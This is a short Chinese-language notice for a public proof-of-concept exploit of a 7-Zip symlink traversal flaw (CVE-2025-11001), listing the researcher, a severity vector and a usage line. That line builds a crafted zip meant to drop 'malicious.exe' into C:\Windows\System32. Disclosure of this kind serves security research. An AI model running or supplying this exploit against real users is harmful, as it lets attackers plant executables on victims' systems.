7-Zip 中的高危符号链接遍历漏洞,允许任意文件写入 / RCE
已在 7-Zip 25.00(2025 年 7 月)中修复 – 已有公开漏洞利用代码
仅限授权的安全测试与研究使用
AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HMohammed Idrees Banyamer
约旦 | 安全研究员
Instagram: @banyamer_security
GitHub: https://github.com/mbanyamer
python3 cve-2025-11001_poc.py \
-t "C:\Windows\System32" \
-p payload/malicious.exe \
-o CVE-2025-11001-exploit.zip